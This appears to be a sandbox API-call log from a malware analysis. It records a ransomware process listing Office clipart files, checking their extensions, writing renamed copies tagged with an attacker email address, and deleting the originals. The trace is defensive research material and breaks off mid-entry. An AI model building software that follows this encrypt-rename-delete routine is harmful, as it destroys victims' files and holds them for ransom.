[0270.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF") returned 63 [0270.848] lstrlenW (lpString=".jpg") returned 4 [0270.848] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF") returned 63 [0270.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF") returned 63 [0270.848] lstrlenW (lpString=".doc") returned 4 [0270.848] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.848] lstrlenW (lpString=".docx") returned 5 [0270.848] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.848] lstrlenW (lpString=".pdf") returned 4 [0270.848] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.849] lstrlenW (lpString=".xls") returned 4 [0270.849] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.849] lstrlenW (lpString=".xlsx") returned 5 [0270.849] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.849] lstrlenW (lpString=".ppt") returned 4 [0270.849] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF") returned 63 [0270.849] lstrlenW (lpString=".zip") returned 4 [0270.849] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.849] lstrlenW (lpString=".rar") returned 4 [0270.849] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.849] lstrlenW (lpString=".bz2") returned 4 [0270.849] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.849] lstrlenW (lpString=".7z") returned 3 [0270.849] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF") returned 63 [0270.849] lstrlenW (lpString=".dbf") returned 4 [0270.849] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF") returned 63 [0270.849] lstrlenW (lpString=".1cd") returned 4 [0270.849] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF") returned 63 [0270.849] lstrlenW (lpString=".jpg") returned 4 [0270.849] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.850] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0270.850] lstrlenW (lpString="EN00202_.WMF") returned 12 [0270.850] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00202_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00202_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0270.865] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=6938) returned 1 [0270.865] CloseHandle (hObject=0x3b0) returned 1 [0270.865] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00202_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00202_.wmf")) returned 0x20 [0270.872] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00202_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00202_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0270.872] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00202_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00202_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0270.872] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.872] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.872] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00202_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00202_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0270.879] GetLastError () returned 0x0 [0270.879] ReadFile (in: hFile=0x388, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x1b1a, lpOverlapped=0x0) returned 1 [0270.883] WriteFile (in: hFile=0x3b0, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x1b20, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0x1b20, lpOverlapped=0x0) returned 1 [0270.884] ReadFile (in: hFile=0x388, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0270.884] WriteFile (in: hFile=0x3b0, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.884] SetEndOfFile (hFile=0x3b0) returned 1 [0270.884] CloseHandle (hObject=0x3b0) returned 1 [0270.884] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.884] SetEndOfFile (hFile=0x388) returned 1 [0270.886] CloseHandle (hObject=0x388) returned 1 [0270.886] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00202_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0270.887] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00202_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00202_.wmf")) returned 1 [0270.887] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00202_.WMF") returned 63 [0270.887] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00202_.WMF") returned 63 [0270.887] lstrlenW (lpString=".doc") returned 4 [0270.887] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.887] lstrlenW (lpString=".docx") returned 5 [0270.887] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.887] lstrlenW (lpString=".pdf") returned 4 [0270.887] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.887] lstrlenW (lpString=".xls") returned 4 [0270.887] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.887] lstrlenW (lpString=".xlsx") returned 5 [0270.887] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.887] lstrlenW (lpString=".ppt") returned 4 [0270.887] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.887] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00202_.WMF") returned 63 [0270.887] lstrlenW (lpString=".zip") returned 4 [0270.887] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.887] lstrlenW (lpString=".rar") returned 4 [0270.887] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.887] lstrlenW (lpString=".bz2") returned 4 [0270.887] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.887] lstrlenW (lpString=".7z") returned 3 [0270.887] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.887] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00202_.WMF") returned 63 [0270.887] lstrlenW (lpString=".dbf") returned 4 [0270.888] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.888] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00202_.WMF") returned 63 [0270.888] lstrlenW (lpString=".1cd") returned 4 [0270.888] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.888] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00202_.WMF") returned 63 [0270.888] lstrlenW (lpString=".jpg") returned 4 [0270.888] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.888] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00202_.WMF") returned 63 [0270.888] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00202_.WMF") returned 63 [0270.888] lstrlenW (lpString=".doc") returned 4 [0270.888] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.888] lstrlenW (lpString=".docx") returned 5 [0270.888] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.888] lstrlenW (lpString=".pdf") returned 4 [0270.888] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.888] lstrlenW (lpString=".xls") returned 4 [0270.888] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.888] lstrlenW (lpString=".xlsx") returned 5 [0270.888] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.888] lstrlenW (lpString=".ppt") returned 4 [0270.888] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.888] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00202_.WMF") returned 63 [0270.888] lstrlenW (lpString=".zip") returned 4 [0270.888] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.888] lstrlenW (lpString=".rar") returned 4 [0270.888] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.888] lstrlenW (lpString=".bz2") returned 4 [0270.888] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.888] lstrlenW (lpString=".7z") returned 3 [0270.889] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00202_.WMF") returned 63 [0270.889] lstrlenW (lpString=".dbf") returned 4 [0270.889] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00202_.WMF") returned 63 [0270.889] lstrlenW (lpString=".1cd") returned 4 [0270.889] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00202_.WMF") returned 63 [0270.889] lstrlenW (lpString=".jpg") returned 4 [0270.889] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.889] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0270.889] lstrlenW (lpString="EN00222_.WMF") returned 12 [0270.889] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00222_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0270.890] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=12356) returned 1 [0270.890] CloseHandle (hObject=0x388) returned 1 [0270.890] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00222_.wmf")) returned 0x20 [0270.890] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00222_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0270.890] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00222_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0270.890] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.890] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.890] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00222_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0270.890] GetLastError () returned 0x0 [0270.890] ReadFile (in: hFile=0x388, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x3044, lpOverlapped=0x0) returned 1 [0270.901] WriteFile (in: hFile=0x3b0, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x3050, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0x3050, lpOverlapped=0x0) returned 1 [0270.902] ReadFile (in: hFile=0x388, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0270.902] WriteFile (in: hFile=0x3b0, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.902] SetEndOfFile (hFile=0x3b0) returned 1 [0270.902] CloseHandle (hObject=0x3b0) returned 1 [0270.902] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.902] SetEndOfFile (hFile=0x388) returned 1 [0270.907] CloseHandle (hObject=0x388) returned 1 [0270.907] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0270.907] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00222_.wmf")) returned 1 [0270.908] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF") returned 63 [0270.908] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF") returned 63 [0270.908] lstrlenW (lpString=".doc") returned 4 [0270.908] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.908] lstrlenW (lpString=".docx") returned 5 [0270.908] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.908] lstrlenW (lpString=".pdf") returned 4 [0270.908] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.908] lstrlenW (lpString=".xls") returned 4 [0270.908] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.908] lstrlenW (lpString=".xlsx") returned 5 [0270.908] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.908] lstrlenW (lpString=".ppt") returned 4 [0270.908] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.908] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF") returned 63 [0270.908] lstrlenW (lpString=".zip") returned 4 [0270.908] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.908] lstrlenW (lpString=".rar") returned 4 [0270.908] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.908] lstrlenW (lpString=".bz2") returned 4 [0270.908] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.908] lstrlenW (lpString=".7z") returned 3 [0270.908] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.908] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF") returned 63 [0270.908] lstrlenW (lpString=".dbf") returned 4 [0270.908] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.908] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF") returned 63 [0270.908] lstrlenW (lpString=".1cd") returned 4 [0270.908] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.909] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF") returned 63 [0270.909] lstrlenW (lpString=".jpg") returned 4 [0270.909] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.909] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF") returned 63 [0270.909] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF") returned 63 [0270.909] lstrlenW (lpString=".doc") returned 4 [0270.909] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.909] lstrlenW (lpString=".docx") returned 5 [0270.909] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.909] lstrlenW (lpString=".pdf") returned 4 [0270.909] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.909] lstrlenW (lpString=".xls") returned 4 [0270.909] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.909] lstrlenW (lpString=".xlsx") returned 5 [0270.909] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.909] lstrlenW (lpString=".ppt") returned 4 [0270.909] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.909] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF") returned 63 [0270.909] lstrlenW (lpString=".zip") returned 4 [0270.909] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.909] lstrlenW (lpString=".rar") returned 4 [0270.909] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.909] lstrlenW (lpString=".bz2") returned 4 [0270.909] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.909] lstrlenW (lpString=".7z") returned 3 [0270.909] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.909] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF") returned 63 [0270.910] lstrlenW (lpString=".dbf") returned 4 [0270.910] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.910] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF") returned 63 [0270.910] lstrlenW (lpString=".1cd") returned 4 [0270.910] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.910] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF") returned 63 [0270.910] lstrlenW (lpString=".jpg") returned 4 [0270.910] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.910] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0270.910] lstrlenW (lpString="EN00242_.WMF") returned 12 [0270.910] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00242_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0270.919] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=6780) returned 1 [0270.919] CloseHandle (hObject=0x3b0) returned 1 [0270.920] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00242_.wmf")) returned 0x20 [0270.920] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00242_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0270.920] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00242_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0270.920] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.920] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.920] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00242_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0270.920] GetLastError () returned 0x0 [0270.920] ReadFile (in: hFile=0x3b0, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x1a7c, lpOverlapped=0x0) returned 1 [0270.954] WriteFile (in: hFile=0x384, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x1a80, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0x1a80, lpOverlapped=0x0) returned 1 [0270.955] ReadFile (in: hFile=0x3b0, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0270.955] WriteFile (in: hFile=0x384, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.956] SetEndOfFile (hFile=0x384) returned 1 [0270.956] CloseHandle (hObject=0x384) returned 1 [0270.956] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.956] SetEndOfFile (hFile=0x3b0) returned 1 [0270.960] CloseHandle (hObject=0x3b0) returned 1 [0270.960] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.051] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00242_.wmf")) returned 1 [0271.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF") returned 63 [0271.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF") returned 63 [0271.052] lstrlenW (lpString=".doc") returned 4 [0271.052] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.052] lstrlenW (lpString=".docx") returned 5 [0271.052] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.052] lstrlenW (lpString=".pdf") returned 4 [0271.052] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.052] lstrlenW (lpString=".xls") returned 4 [0271.052] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.052] lstrlenW (lpString=".xlsx") returned 5 [0271.052] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.052] lstrlenW (lpString=".ppt") returned 4 [0271.052] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF") returned 63 [0271.052] lstrlenW (lpString=".zip") returned 4 [0271.052] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.052] lstrlenW (lpString=".rar") returned 4 [0271.052] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.052] lstrlenW (lpString=".bz2") returned 4 [0271.053] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.053] lstrlenW (lpString=".7z") returned 3 [0271.053] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.053] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF") returned 63 [0271.053] lstrlenW (lpString=".dbf") returned 4 [0271.053] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.053] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF") returned 63 [0271.053] lstrlenW (lpString=".1cd") returned 4 [0271.053] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.053] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF") returned 63 [0271.053] lstrlenW (lpString=".jpg") returned 4 [0271.053] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.053] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF") returned 63 [0271.053] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF") returned 63 [0271.053] lstrlenW (lpString=".doc") returned 4 [0271.053] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.053] lstrlenW (lpString=".docx") returned 5 [0271.053] 